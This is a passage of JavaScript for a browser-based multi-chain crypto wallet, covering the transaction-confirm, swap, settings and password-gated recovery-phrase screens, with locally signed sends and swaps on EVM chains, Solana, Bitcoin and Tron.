        <div style="flex:1"></div>
      </div>
      <div class="bottom-bar">
        <button class="btn btn-secondary" style="flex:1" id="cancel">Cancel</button>
        <button class="btn btn-primary" style="flex:1" id="confirm">Confirm</button>
      </div>
    </div>
  `));
  node.querySelector('[data-back]')?.addEventListener('click', back('sendForm', S.params));
  node.querySelector('#cancel').onclick = () => goto('main');
  const confirmBtn = node.querySelector('#confirm');
  const feeWarn = node.querySelector('#feeWarn');
  const block = (msg) => { feeWarn.style.display = 'block'; feeWarn.textContent = msg; confirmBtn.disabled = true; };

  (async () => {
    try {
      const fee = await estimateFeeFor({ chain, to, amount, contract, decimals });
      const feeNum = parseFloat(fee.feeNative);
      const feeUsdPart = isNative && price != null ? ` (${fmtUsd(feeNum * price)})` : '';
      node.querySelector('#fee').textContent = `~${fmtNum(fee.feeNative, 8)} ${nativeSym}${feeUsdPart}`;
      // Sanity-check the fee against what's actually there, before signing anything.
      if (isNative && parseFloat(amount) + feeNum > parseFloat(balance) + 1e-12) {
        block(`Amount plus network fee (~${fmtNum(fee.feeNative, 8)} ${nativeSym}) is more than your ${fmtNum(balance)} ${nativeSym} balance. Go back and lower the amount, or use Max.`);
      } else if (!isNative) {
        const nb = nativeBalanceFor(chain);
        if (nb != null && nb < feeNum) block(`You need about ${fmtNum(fee.feeNative, 8)} ${nativeSym} on ${chain} to pay the network fee, but this account only has ${fmtNum(nb)} ${nativeSym} there.`);
      }
    } catch { node.querySelector('#fee').textContent = 'unavailable'; }
  })();

  confirmBtn.onclick = async () => {
    confirmBtn.disabled = true; confirmBtn.innerHTML = '<span class="spinner"></span>';
    node.querySelector('#cancel').disabled = true;
    const acct = currentAccount();
    try {
      let result;
      if (EVM_CHAINS[chain]) result = await ops.sendEvm({ chain, privateKey: acct.evm.privateKey, to, amount, contract, decimals });
      else if (chain === 'Solana') result = await ops.sendSolana({ secretKey: acct.solana.secretKey, to, amount, contract, decimals });
      else if (chain === 'Bitcoin') result = await ops.sendBitcoin({ privateKeyWIF: acct.bitcoin.privateKeyWIF, from: acct.bitcoin.address, to, amount });
      else if (chain === 'Tron') result = await ops.sendTron({ privateKey: acct.tron.privateKey, from: acct.tron.address, to, amount, contract, decimals });
      const explorerUrl = explorerTxUrl(chain, result.hash);
      addHistory({ ok: true, kind: 'send', label: `Sent ${fmtNum(amount, 8)} ${symbol}`, chain, time: Date.now(), explorerUrl });
      goto('sendResult', { ok: true, hash: result.hash, explorerUrl, chain, summary: `${fmtNum(amount, 8)} ${symbol} on ${chain}` });
      loadBalances(S.accountIndex);
    } catch (e) {
      goto('sendResult', { ok: false, error: friendlyTxError(e), chain });
    }
  };
}

// Turn the raw RPC/library error into something a person can act on.
function friendlyTxError(e) {
  const m = (e && (e.shortMessage || e.message)) || 'Transaction failed.';
  if (/insufficient funds/i.test(m)) return 'Not enough balance to cover the amount plus the network fee.';
  if (/nonce/i.test(m)) return 'The network rejected the transaction ordering (nonce). Wait a moment and try again.';
  if (/user rejected|denied/i.test(m)) return 'The transaction was cancelled.';
  if (/could not reach|network error|failed to fetch|timeout/i.test(m)) return 'Couldn\'t reach the network. Check your connection and try again.';
  return m.length > 220 ? m.slice(0, 220) + '…' : m;
}

function explorerTxUrl(chain, hash) {
  const c = EVM_CHAINS[chain]; if (c) return `${c.explorer}/tx/${hash}`;
  if (chain === 'Solana') return `https://solscan.io/tx/${hash}`;
  if (chain === 'Bitcoin') return `https://blockstream.info/tx/${hash}`;
  if (chain === 'Tron') return `https://tronscan.org/#/transaction/${hash}`;
  return '#';
}

function renderSendResult() {
  const { ok, hash, explorerUrl, error, summary, chain } = S.params;
  const node = mount(el(`
    <div class="shell">
      <div class="center-col">
        <div style="font-size:56px">${ok ? '✅' : '❌'}</div>
        <h3 style="margin:8px 0 4px">${ok ? 'Transaction sent' : 'Transaction failed'}</h3>
        ${ok ? `<p class="p-muted" style="margin:0">${escapeHtml(summary || '')}<br>It may take a minute to be confirmed on ${escapeHtml(chain || 'the network')}.</p><div class="mono mt-8">${short(hash, 10, 8)}</div>` : `<p class="p-muted">${escapeHtml(error)}</p>`}
        <div class="stack mt-24">
          ${ok ? `<a class="btn btn-secondary btn-block" href="${explorerUrl}" target="_blank" rel="noopener">View on explorer</a>` : ''}
          ${!ok ? `<button class="btn btn-secondary btn-block" id="retry">Back to Send</button>` : ''}
          <button class="btn btn-primary btn-block" id="done">Done</button>
        </div>
      </div>
    </div>
  `));
  node.querySelector('#done').onclick = () => goto('main', { tab: ok ? 'Activity' : 'Tokens' });
  node.querySelector('#retry')?.addEventListener('click', () => goto('send'));
}

// ══════════════════════════════════════════════════════════════════════════
//  SWAP  (same-chain only: EVM via KyberSwap, Solana via Jupiter)
// ══════════════════════════════════════════════════════════════════════════
const EVM_NATIVE_PLACEHOLDER = '0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE';
const SOL_NATIVE_MINT = 'So11111111111111111111111111111111111111112';
const swapSupported = (chain) => !!EVM_CHAINS[chain] || chain === 'Solana';
const swapTokenId = (chain, contract) => contract || (chain === 'Solana' ? SOL_NATIVE_MINT : EVM_NATIVE_PLACEHOLDER);

function renderSwap() {
  const owned = allOwnedTokens().filter(t => parseFloat(t.balance) > 0 && swapSupported(t.chain));
  const chains = [...new Set(owned.map(t => t.chain))];
  const stillLoading = S.loadingIndices.has(bkey());

  if (!owned.length) {
    const node = mount(el(`
      <div class="shell">
        ${screenHeader('Swap', true)}
        <div class="screen">
          ${stillLoading ? loadingBalancesHtml() : `<div class="empty-state">Nothing to swap yet.<br><br>Swaps happen on one network at a time and are available on Ethereum, BNB Chain, Polygon, Arbitrum, Optimism, Base, Avalanche and Solana. Receive some funds on one of those networks first.</div>
          <button class="btn btn-secondary btn-block" id="goReceive">Go to Receive</button>`}
        </div>
      </div>`));
    node.querySelector('[data-back]')?.addEventListener('click', back('main'));
    node.querySelector('#goReceive')?.addEventListener('click', () => goto('receive'));
    if (stillLoading) { const t = setInterval(() => { if (!S.loadingIndices.has(bkey())) { clearInterval(t); if (S.screen === 'swap') render(); } }, 400); }
    return;
  }

  const preset = S.params.presetChain;
  const defaultChain = chains.includes(preset) ? preset : chains[0];
  const node = mount(el(`
    <div class="shell">
      ${screenHeader('Swap', true)}
      <div class="screen">
        <div class="p-muted" style="font-size:13px;margin-bottom:14px">Trade one token for another on the same network. Cross-network swaps aren't supported.</div>
        <label class="label">Network</label>
        <select class="field" id="inChain">${chains.map(c => `<option ${c === defaultChain ? 'selected' : ''}>${escapeHtml(c)}</option>`).join('')}</select>
        <label class="label mt-16">You pay</label>
        <select class="field" id="inToken"></select>
        <input class="field mt-8" id="amt" placeholder="Amount" inputmode="decimal" autocomplete="off">
        <div class="row-between mt-8"><div class="p-muted" id="inUsd"></div><button class="btn-link" id="max"></button></div>
        <label class="label mt-16">You receive</label>
        <div id="outPicker"></div>
        <div style="flex:1"></div>
        <button class="btn btn-accent btn-block mt-16" id="quote" disabled>Get quote</button>
      </div>
    </div>
  `));
  node.querySelector('[data-back]')?.addEventListener('click', back('main'));
  const inChainSel = node.querySelector('#inChain'), inTokenSel = node.querySelector('#inToken'), amt = node.querySelector('#amt'), quoteBtn = node.querySelector('#quote');
  const outPicker = node.querySelector('#outPicker');
  let selectedOut = null; // { chain, contract|null, symbol, name, logo, type }
  let outCache = { chain: null, top: [], search: [], query: '', loading: false };
  let outDebounce = null;

  const currentIn = () => { const o = inTokenSel.selectedOptions[0]; return o ? owned.find(t => t.chain === inChainSel.value && (t.contract || '') === o.value) : null; };
  const sameToken = (a, b) => a && b && (a.contract || '').toLowerCase() === (b.contract || '').toLowerCase();
  const refreshQuoteBtn = () => { quoteBtn.disabled = !(selectedOut && parseFloat(amt.value) > 0); };

  function fillTokens() {
    const chain = inChainSel.value;
    const list = owned.filter(t => t.chain === chain);
    const presetContract = S.params.presetContract;
    inTokenSel.innerHTML = list.map(t => `<option value="${t.contract || ''}" ${presetContract != null && (t.contract || '') === presetContract ? 'selected' : ''}>${escapeHtml(t.symbol)} — ${fmtNum(t.balance)} available</option>`).join('');
    onInTokenChange();
  }
  function onInTokenChange() {
    const t = currentIn();
    node.querySelector('#max').textContent = t ? `Max: ${fmtNum(t.balance)} ${t.symbol}` : '';
    amt.dispatchEvent(new Event('input'));
    if (selectedOut && (selectedOut.chain !== inChainSel.value || sameToken(selectedOut, t))) selectedOut = null;
    drawOutPicker();
  }
  amt.oninput = () => { const t = currentIn(); node.querySelector('#inUsd').textContent = t?.price != null && amt.value ? '≈ ' + fmtUsd((parseFloat(amt.value) || 0) * t.price) : ''; refreshQuoteBtn(); };
  node.querySelector('#max').onclick = () => { const t = currentIn(); if (t) { amt.value = t.balance; amt.dispatchEvent(new Event('input')); } };

  async function loadOutTop(chain) {
    outCache = { chain, top: [], search: [], query: '', loading: true };
    drawOutPicker();
    try {
      const r = await fetch(`/api/tokens/top?chain=${encodeURIComponent(chain)}&offset=0&limit=40`).then(r => r.json());
      if (outCache.chain === chain) outCache.top = (r.tokens || []).map(t => ({ ...t, chain }));
    } catch {}
    if (outCache.chain === chain) { outCache.loading = false; drawOutPicker(); }
  }

  function drawOutPicker() {
    const chain = inChainSel.value;
    if (outCache.chain !== chain) { loadOutTop(chain); return; }
    if (selectedOut) {
      const row = el(`<div class="picked-token">
        ${tokenIconHtml(chain, selectedOut)}
        <div class="token-main"><div class="token-name"><span class="sym">${escapeHtml(selectedOut.symbol)}</span>${netPillHtml(chain)}</div><div class="token-sub">${escapeHtml(selectedOut.name || '')}</div></div>
        <button class="btn-link" id="changeOut" style="font-size:14px">Change</button>
      </div>`);
      row.querySelector('#changeOut').onclick = () => { selectedOut = null; drawOutPicker(); setTimeout(() => outPicker.querySelector('input')?.focus(), 0); refreshQuoteBtn(); };
      outPicker.replaceChildren(row);
      refreshQuoteBtn();
      return;
    }
    const inTok = currentIn();
    const source = outCache.query ? outCache.search : outCache.top;
    const rows = source.filter(t => !sameToken(t, inTok)).slice(0, 40);
    const wrap = el(`<div class="picker">
      <div class="search-field">${renderIcon('search', 16)}<input id="outSearch" placeholder="Search a token on ${escapeHtml(chain)}" value="${escapeHtml(outCache.query)}" autocomplete="off"></div>
      <div class="picker-list" id="outList">
        ${outCache.loading && !rows.length ? loadingBalancesHtml(outCache.query ? 'Searching…' : 'Loading tokens…') : rows.length ? rows.map(t => tokenRowHtml({ ...t, balance: undefined })).join('') : `<div class="empty-state" style="padding:24px">No tokens found${outCache.query ? ` for "${escapeHtml(outCache.query)}"` : ''}.</div>`}
      </div>
    </div>`);
    const input = wrap.querySelector('#outSearch');
    input.oninput = () => {
      const q = input.value;
      outCache.query = q;
      clearTimeout(outDebounce);
      if (!q.trim()) { outCache.search = []; outCache.loading = false; redrawOutList(); return; }
      outCache.loading = true; redrawOutList();
      outDebounce = setTimeout(async () => {
        try {
          const r = await fetch(`/api/tokens/search?chain=${encodeURIComponent(chain)}&q=${encodeURIComponent(q)}`).then(r => r.json());
          if (outCache.query === q) outCache.search = (r.tokens || []).map(t => ({ ...t, chain }));
        } catch {}
        if (outCache.query === q) { outCache.loading = false; redrawOutList(); }
      }, 250);
    };
    outPicker.replaceChildren(wrap);
    bindOutRows();
    refreshQuoteBtn();
  }
  // Only swap the result list, keeping the search input (and the caret in it) in place.
  function redrawOutList() {
    const listEl = outPicker.querySelector('#outList'); if (!listEl) return;
    const inTok = currentIn();
    const source = outCache.query ? outCache.search : outCache.top;
    const rows = source.filter(t => !sameToken(t, inTok)).slice(0, 40);
    listEl.innerHTML = outCache.loading && !rows.length ? loadingBalancesHtml(outCache.query ? 'Searching…' : 'Loading tokens…') : rows.length ? rows.map(t => tokenRowHtml({ ...t, balance: undefined })).join('') : `<div class="empty-state" style="padding:24px">No tokens found for "${escapeHtml(outCache.query)}".</div>`;
    bindOutRows();
  }
  function bindOutRows() {
    outPicker.querySelectorAll('.token-row').forEach(r => r.onclick = () => {
      const source = outCache.query ? outCache.search : outCache.top;
      const t = source.find(x => (x.contract || '') === (r.dataset.contract || ''));
      if (!t) return;
      selectedOut = { chain: inChainSel.value, contract: t.contract || null, symbol: t.symbol, name: t.name, logo: t.logo, type: t.contract ? undefined : 'NATIVE' };
      drawOutPicker();
    });
  }

  inChainSel.onchange = fillTokens;
  inTokenSel.onchange = onInTokenChange;
  fillTokens();

  quoteBtn.onclick = async () => {
    const chain = inChainSel.value;
    const inTok = currentIn();
    if (!inTok || !selectedOut) return;
    const amount = amt.value.trim();
    if (!(parseFloat(amount) > 0) || parseFloat(amount) > parseFloat(inTok.balance)) { toast(`Enter an amount up to ${fmtNum(inTok.balance)} ${inTok.symbol}.`); return; }
    quoteBtn.disabled = true; quoteBtn.innerHTML = '<span class="spinner"></span>';
    try {
      const amountRaw = BigInt(ethersParseUnits(amount, inTok.decimals)).toString();
      const q = await fetch(`/api/swap/quote?chain=${encodeURIComponent(chain)}&inToken=${swapTokenId(chain, inTok.contract)}&outToken=${swapTokenId(chain, selectedOut.contract)}&amount=${amountRaw}&slippage=0.5`).then(r => r.json());
      if (q.error) throw new Error(q.error);
      goto('swapReview', { chain, inToken: swapTokenId(chain, inTok.contract), outToken: swapTokenId(chain, selectedOut.contract), amount, amountRaw, decimals: inTok.decimals, quote: q, symbol: inTok.symbol, inPrice: inTok.price, outSymbol: q.outToken?.symbol || selectedOut.symbol, outLogo: selectedOut.logo, outContract: selectedOut.contract, outPrice: selectedOut.price });
    } catch (e) { quoteBtn.disabled = false; quoteBtn.textContent = 'Get quote'; toast(friendlySwapError(e.message)); }
  };
}

function ethersParseUnits(amount, decimals) { return ops.parseUnits(amount, decimals ?? 18); }
function friendlySwapError(m) {
  if (/no route|route not found|insufficient liquidity/i.test(m || '')) return 'No swap route found for this pair — try a more common token or a smaller amount.';
  return m || 'Couldn\'t get a quote right now.';
}

function renderSwapReview() {
  const { chain, inToken, outToken, amount, amountRaw, quote, symbol, inPrice, outSymbol, outPrice } = S.params;
  const isSol = chain === 'Solana';
  const outAmount = parseFloat(quote.outAmount) / 10 ** (quote.outToken?.decimals ?? 18);
  const inUsd = inPrice != null ? (parseFloat(amount) || 0) * inPrice : null;
  const outUsd = outPrice != null ? outAmount * outPrice : null;
  const node = mount(el(`
    <div class="shell">
      ${screenHeader('Review swap', true)}
      <div class="screen">
        <div class="mt-8" style="border:1px solid var(--border);border-radius:var(--radius-md);padding:14px 16px">
          <div class="p-muted" style="font-size:12.5px">You pay</div>
          <div style="font-size:22px;font-weight:700;word-break:break-all">${escapeHtml(fmtNum(amount, 8))} ${escapeHtml(symbol)}</div>
          ${inUsd != null ? `<div class="p-muted" style="font-size:13px">${fmtUsd(inUsd)}</div>` : ''}
        </div>
        <div class="text-center" style="margin:8px 0;color:var(--text-muted)">↓</div>
        <div style="border:1px solid var(--border);border-radius:var(--radius-md);padding:14px 16px">
          <div class="p-muted" style="font-size:12.5px">You receive (estimated)</div>
          <div style="font-size:22px;font-weight:700;word-break:break-all">${fmtNum(outAmount, 8)} ${escapeHtml(outSymbol || '')}</div>
          ${outUsd != null ? `<div class="p-muted" style="font-size:13px">${fmtUsd(outUsd)}</div>` : ''}
        </div>
        <div class="mt-24">
          <div class="row-between" style="padding:10px 0;border-bottom:1px solid var(--border)"><span class="p-muted">Network</span>${netPillHtml(chain)}</div>
          <div class="row-between" style="padding:10px 0;border-bottom:1px solid var(--border)"><span class="p-muted">Rate</span><span>1 ${escapeHtml(symbol)} ≈ ${fmtNum(outAmount / (parseFloat(amount) || 1), 6)} ${escapeHtml(outSymbol || '')}</span></div>
          <div class="row-between" style="padding:10px 0;border-bottom:1px solid var(--border)"><span class="p-muted">Est. price impact</span><span>${quote.priceImpactPct != null ? (parseFloat(quote.priceImpactPct) * (isSol ? 100 : 1)).toFixed(2) + '%' : '—'}</span></div>
          <div class="row-between" style="padding:10px 0;border-bottom:1px solid var(--border)"><span class="p-muted">Slippage tolerance</span><span>0.5%</span></div>
          <div class="row-between" style="padding:10px 0"><span class="p-muted">Provider</span><span>${isSol ? 'Jupiter' : 'KyberSwap'}</span></div>
        </div>
        ${!isSol && inToken.toLowerCase() !== EVM_NATIVE_PLACEHOLDER.toLowerCase() ? `<div class="p-muted" style="font-size:12.5px">The first swap of a token may need an extra "approve" transaction (one more network fee) before the swap itself.</div>` : ''}
        <div style="flex:1"></div>
      </div>
      <div class="bottom-bar">
        <button class="btn btn-secondary" style="flex:1" id="cancel">Cancel</button>
        <button class="btn btn-primary" style="flex:1" id="confirm">Confirm swap</button>
      </div>
    </div>
  `));
  node.querySelector('[data-back]')?.addEventListener('click', back('swap', { presetChain: chain }));
  node.querySelector('#cancel').onclick = () => goto('main');
  node.querySelector('#confirm').onclick = async () => {
    const btn = node.querySelector('#confirm'); btn.disabled = true; btn.innerHTML = '<span class="spinner"></span>';
    node.querySelector('#cancel').disabled = true;
    const acct = currentAccount();
    const label = `Swapped ${fmtNum(amount, 8)} ${symbol} → ${outSymbol || ''}`;
    try {
      let result, explorerUrl;
      if (isSol) {
        const build = await fetch(`/api/swap/build?chain=Solana&inToken=${inToken}&outToken=${outToken}&amount=${amountRaw}&slippage=0.5&account=${acct.solana.address}`).then(r => r.json());
        if (build.error) throw new Error(build.error);
        result = await ops.signAndSendSolanaSwapTx({ secretKey: acct.solana.secretKey, swapTransactionB64: build.swapTransaction });
        explorerUrl = `https://solscan.io/tx/${result.hash}`;
      } else {
        const build = await fetch(`/api/swap/build?chain=${encodeURIComponent(chain)}&inToken=${inToken}&outToken=${outToken}&amount=${amountRaw}&slippage=0.5&account=${acct.evm.address}`).then(r => r.json());
        if (build.error) throw new Error(build.error);
        const isNativeIn = inToken.toLowerCase() === EVM_NATIVE_PLACEHOLDER.toLowerCase();
        if (!isNativeIn && build.spender) {
          btn.innerHTML = '<span class="spinner"></span> Approving…';
          await ops.approveErc20IfNeeded({ chain, privateKey: acct.evm.privateKey, owner: acct.evm.address, token: inToken, spender: build.spender, amount: BigInt(amountRaw) });
          btn.innerHTML = '<span class="spinner"></span>';
        }
        result = await ops.signAndSendEvmSwapTx({ chain, privateKey: acct.evm.privateKey, to: build.to, data: build.data, value: build.value });
        explorerUrl = explorerTxUrl(chain, result.hash);
      }
      addHistory({ ok: true, kind: 'swap', label, chain, time: Date.now(), explorerUrl });
      goto('swapResult', { ok: true, hash: result.hash, explorerUrl, chain, summary: `${fmtNum(amount, 8)} ${symbol} → ~${fmtNum(outAmount, 8)} ${outSymbol || ''}` });
      loadBalances(S.accountIndex);
    } catch (e) { goto('swapResult', { ok: false, error: friendlyTxError(e), chain }); }
  };
}

function renderSwapResult() {
  const { ok, hash, explorerUrl, error, summary, chain } = S.params;
  const node = mount(el(`
    <div class="shell">
      <div class="center-col">
        <div style="font-size:56px">${ok ? '✅' : '❌'}</div>
        <h3 style="margin:8px 0 4px">${ok ? 'Swap submitted' : 'Swap failed'}</h3>
        ${ok ? `<p class="p-muted" style="margin:0">${escapeHtml(summary || '')}<br>Your balances will update once ${escapeHtml(chain || 'the network')} confirms it.</p><div class="mono mt-8">${short(hash, 10, 8)}</div>` : `<p class="p-muted">${escapeHtml(error)}</p>`}
        <div class="stack mt-24">
          ${ok ? `<a class="btn btn-secondary btn-block" href="${explorerUrl}" target="_blank" rel="noopener">View on explorer</a>` : `<button class="btn btn-secondary btn-block" id="retry">Back to Swap</button>`}
          <button class="btn btn-primary btn-block" id="done">Done</button>
        </div>
      </div>
    </div>
  `));
  node.querySelector('#done').onclick = () => goto('main', { tab: ok ? 'Activity' : 'Tokens' });
  node.querySelector('#retry')?.addEventListener('click', () => goto('swap'));
}

// ══════════════════════════════════════════════════════════════════════════
//  SETTINGS / REVEAL PHRASE
// ══════════════════════════════════════════════════════════════════════════
function renderSettings() {
  const node = mount(el(`
    <div class="shell">
      ${screenHeader('Settings', true)}
      <div class="screen">
        <div class="label" style="padding:6px 4px 8px">Default address</div>
        <p class="p-muted" style="margin-top:-4px">Which network's address is shown on the main screen and copied when you tap it directly.</p>
        <div id="defaultChainPicker" class="chip-row mt-8" style="margin-bottom:20px">
          ${ADDRESS_POPOVER_CHAINS.map(c => `<button class="chip ${S.meta.defaultAddressChain === c ? 'picked' : ''}" data-chain="${c}">${c}</button>`).join('')}
        </div>
        <div class="list-row" id="reveal">${renderIcon('key', 18)}<div class="token-main">Show Secret Recovery Phrase</div></div>
        <div class="list-row" id="lock">${renderIcon('lock', 18)}<div class="token-main">Lock wallet</div></div>
        <div class="list-row" id="reset">${renderIcon('trash', 18)}<div class="token-main" style="color:var(--danger)">Reset this device</div></div>
        <p class="p-muted mt-24">Metafox V3 Wallet · client-side key custody. Your keys never leave this browser.</p>
      </div>
    </div>
  `));
  node.querySelector('[data-back]')?.addEventListener('click', back('main'));
  node.querySelectorAll('#defaultChainPicker [data-chain]').forEach(btn => btn.onclick = () => {
    S.meta.defaultAddressChain = btn.dataset.chain; saveMeta(S.meta);
    node.querySelectorAll('#defaultChainPicker [data-chain]').forEach(b => b.classList.toggle('picked', b === btn));
  });
  node.querySelector('#reveal').onclick = () => goto('revealPhrase');
  node.querySelector('#lock').onclick = () => lockWallet();
  node.querySelector('#reset').onclick = () => goto('resetConfirm');
}

function renderRevealPhrase() {
  let wid = S.params.walletId || S.walletId;
  const multi = S.meta.wallets.length > 1;
  const node = mount(el(`
    <div class="shell">
      ${screenHeader('Secret Recovery Phrase', true)}
      <div class="screen">
        <div id="gate">
          ${multi ? `<label class="label">Which wallet?</label><div class="chip-row" id="walletPick" style="margin-bottom:16px">${S.meta.wallets.map(w => `<button class="chip ${w.id === wid ? 'picked' : ''}" data-w="${w.id}">${escapeHtml(w.name)}</button>`).join('')}</div>` : ''}
          <p class="p-muted">Enter your password to reveal the Secret Recovery Phrase for <b id="revealName">${escapeHtml(walletName(wid))}</b>.</p>
          <input class="field mt-8" type="password" id="pw" placeholder="Password" autocomplete="current-password">
          <div class="field-hint error" id="err" style="display:none"></div>
          <button class="btn btn-primary btn-block mt-16" id="ok">Show phrase</button>
        </div>
        <div id="phrase" style="display:none">
          <div class="p-muted" style="font-weight:600;margin-bottom:8px" id="phraseTitle"></div>
          <div class="danger-box">Never share this. Anyone with these words can take everything in this wallet.</div>
          <div class="phrase-grid" id="grid"></div>
          <button class="btn btn-secondary btn-block mt-16" id="copyPhrase">Copy to clipboard</button>
        </div>
      </div>
    </div>
  `));
  node.querySelector('[data-back]')?.addEventListener('click', back(S.params.from || 'settings'));
  node.querySelectorAll('#walletPick [data-w]').forEach(b => b.onclick = () => {
    wid = b.dataset.w;
    node.querySelectorAll('#walletPick [data-w]').forEach(x => x.classList.toggle('picked', x === b));
    node.querySelector('#revealName').textContent = walletName(wid);
  });
  const pw = node.querySelector('#pw');
  const go = async () => {
    try {
      const wallets = await readVault(pw.value);
      const mnemonic = wallets.find(w => w.id === wid)?.mnemonic;
      if (!mnemonic) throw new Error('That wallet is no longer in the vault.');
      node.querySelector('#gate').style.display = 'none';
      node.querySelector('#phrase').style.display = 'block';
      node.querySelector('#phraseTitle').textContent = walletName(wid);
      node.querySelector('#grid').innerHTML = mnemonic.split(' ').map((w, i) => `<div class="phrase-chip"><span class="n">${i + 1}</span>${w}</div>`).join('');
      node.querySelector('#copyPhrase').onclick = () => copyText(mnemonic);
    } catch (e) {
      const err = node.querySelector('#err'); err.style.display = 'block'; err.textContent = e.message;
    }
  };
  node.querySelector('#ok').onclick = go;
  pw.addEventListener('keydown', (e) => { if (e.key === 'Enter') go(); });
  setTimeout(() => pw.focus(), 0);
}

// ── Boot ──────────────────────────────────────────────────────────────────────
boot();
